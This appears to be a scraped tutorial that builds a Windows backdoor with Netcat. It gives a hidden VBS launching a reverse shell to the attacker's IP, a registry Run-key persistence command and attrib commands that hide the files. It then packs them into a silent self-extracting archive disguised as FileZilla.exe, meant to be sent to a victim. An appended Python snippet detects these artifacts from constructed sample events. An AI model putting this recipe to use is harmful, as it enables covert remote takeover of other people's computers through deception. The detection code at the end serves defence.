netcat by knight crawler
TRANSCRIPT
8/8/2019 Netcat by Knight Crawler
http://slidepdf.com/reader/full/netcat-by-knight-crawler 1/9
Netcat as backdoor in Microsoft Windows
by
KnightCrawler
Thanks to Auditorsec and Ne011
for their time and support
1 Netcat as backdoor in Windows| KnightCrawler
Objective:
To use Netcat as a backdoor in Microsoft Windows.
Tools required:
Netcat
Download link: http://securityoverride.com/infusions/pro_download_panel/download.php?did=10
Resource Hacker
Download link: http://en.kioskea.net/download/download-1536-reshack
WinRAR
Download Link: http://www.rarlab.com/download.htm
Note:
For this purpose I'm using a bridged VirtualBox. You can try it there or in a real network.
I'm using Windows XP Professional SP2.
Attacking machine:
Name: xp-attacker
Internal IP: 192.168.1.2
Victim machine:
Name: xp-victim
Internal IP: 192.168.1.3
DO NOT USE IT FOR DESTRUCTION PURPOSE BECAUSE WE ARE HERE TO LEARN.
THE AUTHOR TAKES NO RESPONSIBILITY OF ANY DAMAGE TO ANYONE OR ANYTHING.
Step 1:
Download the files and save them in the attacking machine.
Step 2:
Open notepad and make a .vbs file that will run our Netcat when the victim powers on his computer.
Save this file as anyname.vbs
I have saved this file as file.vbs
Contents of the vbs file:
Const HIDDEN_WINDOW = 1
strComputer = "."
Set objStartup = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2:Win32_ProcessStartup")
Set objProcess = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2:Win32_Process")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
errReturn = objProcess.Create("C:\windows\system32\nc.exe -d -e cmd.exe 192.168.1.2 4444", null, objConfig, intProcessID)

C:\windows\system32\    Path where the Netcat file (nc.exe) is present and is to be run.
192.168.1.2             Internal IP address of the attacker.
4444                    Open port on the attacker.
Step 3:
Now add a value in windows Registry so that file.vbs runs every time the system boots up.
For this open notepad and make a .cmd file that will add the required value to the registry.
Save this file as anyname.cmd
I have saved this file as addreg.cmd
Contents of the cmd file:
reg add HKLM\software\microsoft\windows\currentversion\run /f /v nc /d C:\windows\system32\file.vbs

HKLM\software\microsoft\windows\currentversion\run    Location in the registry
/f                                                    Forces the entry to be added to the registry
/v nc                                                 Sets the name of the entry
/d C:\windows\system32\file.vbs                       Sets the value of the entry
Step 4:
Now we create another .cmd file to run: nc.exe, file.vbs, addreg.cmd
And also to set the file attributes.
For this open notepad and make a .cmd file.
Save this file as anyname.cmd
I have saved this file as run.cmd
Contents of the cmd file:
attrib +s +h C:\windows\system32\nc.exe
attrib +s +h C:\windows\system32\file.vbs
attrib +s +h C:\windows\system32\addreg.cmd
attrib +s +h C:\windows\system32\run.cmd
file.vbs
addreg.cmd

attrib                  To set file attributes
+s                      Mark the file as a system file
+h                      Mark the file as hidden
C:\windows\system32\    Location of the files
file.vbs                Run this file
addreg.cmd              Run this file
Step 5:
Now we have to create our final file that will be run on the victim’s computer.
For this add all the files:
nc.exe, file.vbs, addreg.cmd, run.cmd
to the archive as shown below
Save this file as anyname.exe
Select Create SFX archive and Lock archive
I'm using the name FileZilla.exe because I will be using its icon later on.
Now select SFX options from the Advanced tab.
Now set Path to extract and Run after extraction in the General tab.
Set the Silent mode to Hide all in the Modes tab.
Set Update mode to Extract and replace files and Overwrite mode to Overwrite all files in Update tab.
Press Ok twice and you will have your file FileZilla.exe
Step 6:
Now we have to change its icon to attract the victim to open it.
For this we use Resource Hacker.
Open resource hacker and then open your file FileZilla.exe
Select icon group and there select the value, right-click on it and click Replace resource
Now click Open file with new icon. Then select the icon of your choice and click Replace.
Now we have replaced the icon.
Save the file with a new name I choose FileZilla.exe only and replaced the old file with it.
Step 7:
Send this file FileZilla.exe to the victim.
Open netcat and run the following command.
Nc –Lvp 444
Step 8:
When the file FileZilla.exe is executed in the victim’s computer then the attacker will get remote control of the victim’s computer.
The attacker’s screen will look something like this:
Step 9:
And you are done☺
It is requested that you play safe and don’t create havoc with this.
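A defender-side view of the artifacts that Steps 2 to 4 leave on a host, as an added example that is not part of the original document: Python detection logic run over constructed process-creation and registry records. The record layout, rule names and sample events are assumptions made for illustration.

```python
import re

# Constructed sample telemetry (not from the original page), shaped like the
# artifacts Steps 2-4 leave behind, plus two benign records for contrast.
RUN = r"HKLM\software\microsoft\windows\currentversion\run"
SAMPLE_EVENTS = [
    {"type": "process", "cmdline": r"C:\windows\system32\nc.exe -d -e cmd.exe 192.168.1.2 4444"},
    {"type": "process", "cmdline": r"attrib +s +h C:\windows\system32\file.vbs"},
    {"type": "registry", "key": RUN, "name": "nc", "data": r"C:\windows\system32\file.vbs"},
    {"type": "process", "cmdline": r"C:\Program Files\FileZilla\filezilla.exe"},
    {"type": "registry", "key": RUN, "name": "ctfmon", "data": r"C:\windows\system32\ctfmon.exe"},
]

# Keyed on the arguments, not the image name, so a renamed binary still matches.
EXEC_SHELL = re.compile(r'\s-e\s+"?\S*\b(cmd|powershell)(\.exe)?"?\s+\S+\s+\d{1,5}\s*$', re.I)
ATTRIB = re.compile(r"\battrib(\.exe)?\b", re.I)
SYSTEM32 = re.compile(r"\\windows\\system32\\", re.I)
RUN_KEY = re.compile(r"\\currentversion\\run(once)?$", re.I)
SCRIPT_EXT = re.compile(r'\.(vbs|vbe|js|jse|wsf|cmd|bat)"?\s*$', re.I)

def check_process(cmdline):
    """Return the rule names a process command line triggers."""
    hits = []
    if EXEC_SHELL.search(cmdline):
        hits.append("shell_bound_to_socket")
    low = cmdline.lower()
    if ATTRIB.search(cmdline) and "+s" in low and "+h" in low and SYSTEM32.search(cmdline):
        hits.append("system32_file_hidden")
    return hits

def check_registry(key, data):
    """Flag a Run/RunOnce value whose data is a script instead of an executable."""
    if RUN_KEY.search(key) and SCRIPT_EXT.search(data):
        return ["run_key_launches_script"]
    return []

def detect(events):
    """Return (rule, evidence) pairs for every record that triggers a rule."""
    findings = []
    for ev in events:
        if ev["type"] == "process":
            rules, evidence = check_process(ev["cmdline"]), ev["cmdline"]
        else:
            rules, evidence = check_registry(ev["key"], ev["data"]), ev["data"]
        findings += [(rule, evidence) for rule in rules]
    return findings

if __name__ == "__main__":
    for rule, evidence in detect(SAMPLE_EVENTS):
        print(f"{rule:26} {evidence}")
```

The three rules fire on the first three sample records and stay silent on the legitimate FileZilla launch and the ctfmon Run entry.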